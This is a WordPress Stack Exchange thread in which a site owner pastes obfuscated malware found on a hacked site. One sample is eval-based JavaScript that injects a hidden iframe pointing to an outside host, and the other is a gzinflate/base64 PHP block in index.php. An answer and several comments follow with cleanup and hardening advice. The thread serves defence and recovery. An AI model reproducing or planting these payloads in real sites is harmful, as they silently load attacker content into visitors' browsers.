# Wordpress Malware Problem help!

Tags: security, customization

> **Possible Duplicate:**
>   [Wordpress Trojan issue help!](https://wordpress.stackexchange.com/questions/43195/wordpress-trojan-issue-help)

I accessed the wordpress website I am building and received a warning about a trojan from my anti virus software. I have now checked the site with various online scanners and it appears that someone has planted an inline frame containing the code posted below...

I didnt even know wordpress could get infected in this way. Please help me out!

Here is a screenshot of the antivirus warning.

https://i.stack.imgur.com/NaSE6.png

and here is some of the malicious code script code planted on my site.

- if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new
  Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new
  Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);

and inside the index.php

1. ## 1583b0# echo(gzinflate(base64_decode("1VZNc5swEP0r3VwEZbCRMJIYQi7pvYceXR8YGxIyiZ0ALelk8t+7u4jEIbabHnroDPIs0tun/XhCPm/XTX3fXdSV19fbza5fio0IxA7HGscPHHc4ym0nVn5R5PPv/XxWPpZrb1v2n74UXen5/gw9y8dgucoKhIhIZF3z6wkp51LFDn5WnDkc5ImfPa+Lbn3tPTw8+E9tm3/rmnp7lT2jT1EMsK9kFj7keSj9KhdhHAENrUHHEBqQoCUYBToCY8HgigKDMwYM6AW/GSCHlO39dQ3KgFWwSCCxBI5TMgaMhAiSlJklgSJQkChAxAItu4AxktdoTPLqjrZEnHrFWE3h4hJGglujga9TnqOp2IgocR9jhujCBJQ8sHHIiREWI6awdcIM+MQgU7DASGbUzKgHY8Fbp8RnmQmDcQXUVMuI1tHTEpcFLpXk6kuMh4tFgeEm2JSEXqWlJYQlbKSMtSMwwgnEIUXqZtF38Iq4NENZOX+Mj3NhJ16liBUDFi7DCcBwqaxyjedVk3IFNf0mbOvU1RSBWBxXEM5qKD42EOtmlPOiWDS/SsInHLfRrnTGuvaoUW/UHEPIlJkMu8YvE9iimNpoDzQSV6jHUwmNSol5N8l92QsqNMfFOBGbGdSesA+fJcXyOXGeBhFyT4dEDx4sOjrvg4iGXGjW6Z+apkdxJq4pLzUklhclo7z+Vym/yXpfkuYPehxP70SR0Qm+I0plpmNaPcG3r2HmSE/uPqr7EPRD7Z4c+aHp7kj/vXjefyLeE37s4/uv7hHDsJiegQ0hyo49H0RGOU8+AmLW3t/WnSdA+NndJheFyMp8vLhLvKh/FrdilfV5lbW5EFnV5KLC6YYu9LvL66IRWZO37bJqAnG525QIrnaNV+dRFl3UYT+7LbdX3XVWB4H/dJPXSNMGjRengfzcL29W/vE7uvRaPzufuz8UvwE=")));

   ## /1583b0

How can i remove this and recover the site???

Comment: make sure you remove the code from your index.php, and look at your access log to see how they got in there

Comment: "***migrated from webmasters.stackexchange.com** 13 hours ago. This question came from our site for pro webmasters.*" - so, given that hacked-site questions are **explicitly out of scope** in our FAQ, once again, a sister SE site migrates an out-of-scope question to WPSE. When will this stop?

Comment: @ChipBennett it is a wordpress centric question and I guess the expectation was that the wordpress stack would have some helpful advice for the OP - even if the question is specifically out of scope I would have thought someone would have put together a cleanup wiki entry - if only because people come here looking for help. This kind of thinking is why I use StackOverflow for WP questions and not the actual Wordpress site.

Comment: "*even if the question is specifically out of scope...*" - so, is it normal practice for SE sites to send questions to other SE sites, when the questions are *knowingly* out of scope? If so, then what is the point of even *having* a scope?

Comment: @ChipBennett there are a number of things or question types that are effectively out of scope but frequently asked, and that's why the COMMUNITY WIKI exists, to HELP people. Jeez!

Comment: @toomanyairmiles (1) when something explicitly mentioned is out of scope in FAQ - it's exactly because it won't get good answers on that stack. We put hacks as off topic in FAQ because we **meant** that it is poor fit for us. (2) it is highly discouraged to use community wiki mechanic to justify out of scope questions. Such usage was exactly the reason community wiki were made much more restrictive to apply.

Answer (score 4):

> **Basic Security Steps**

Since Wordpress is so popular there are a lot of [drive by hacks](http://wordpress.org/tags/malware) knocking around taking advantage of flaws in basic security. All Wordpress users should take the following basic and easy steps to protect themselves:-

- Do not use wp_ as the database table prefix, use any string of random characters that appeals.
- Turn off Wordpress DB errors.
- Make sure your directory's are set to chmod 755 and files 644.
- Use a [secure password generator](http://strongpasswordgenerator.com/) (use at least 15 characters).
- Do not use admin as a username.
- Place a blank .htaccess file in the wp-admin directory.
- [Read Wordpress hardening](https://wordpress.org/support/article/hardening-wordpress/)
- Check the Google Cache of your site for hidden malware, some cunning malware only displays its payload to the google bot.
- Remove `<meta name="generator" content="WordPress X.X.X" />` from your site's header by placing `remove_action('wp_head', 'wp_generator');` in your functions.php file (drive by attackers will not have an easy way to find which version they are targeting if you do this).

> **TimThumb Hack**

There is also a [very popular drive by hack associated with an old version of the popular tim thumb script](http://www.wpbeginner.com/wp-tutorials/how-to-fix-and-cleanup-the-timthumb-hack-in-wordpress/), which causes a lot of problems for webmasters. Check your uploads directory for php files and ensure you've upgraded to the latest version of the script to avoid this.

> **Advice**

I run about 10 different Wordpresses and have found the WP-Security plugin and account from [website defender](http://www.websitedefender.com/) invaluable, it scans your site regularly and reports on security errors, malware, and even page errors via email so you can be assured that you know when something goes wrong.

[WP-Firewall](http://wordpress.org/extend/plugins/wordpress-firewall-2/) is also very useful for defense against 0-Day exploits and [VirusTotal](https://www.virustotal.com/) is handy if you suspect an infection.

[Akismet](http://akismet.com/) and [Disqus.com](http://disqus.com/admin/install/) are useful tools for defending against comment spam, and you should read the [webmaster pros community wiki on this subject](https://webmasters.stackexchange.com/questions/25373/how-can-i-prevent-spam-on-sites-which-i-control).

> **Webmaster Tools**

You should also sign up to Google Webmaster Tools, **but if you suspect an infection, take all steps to find and clean it up first** or you may end up with Google warning your users that yours is a reported attack site.

If it detects an infection Google will send an email to all of the following addresses `abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@` so you should ensure that you have at least one of these in place and monitored.

> **Paid Removal Services / Where To Get Help**

There are also a number of sites which offer paid malware removal services, I would be **very suspicious** of these - many appear to be scams of one sort or another.

There is plenty of high quality help and support available **for free** in the [wordpress forums](http://wordpress.org/support/), on [webmaster pro's](https://webmasters.stackexchange.com/questions), the [wordpress stackexchange site](https://wordpress.stackexchange.com/) and on [stackoverflow](https://stackoverflow.com/). **Don't pay for things you can fix on your own.**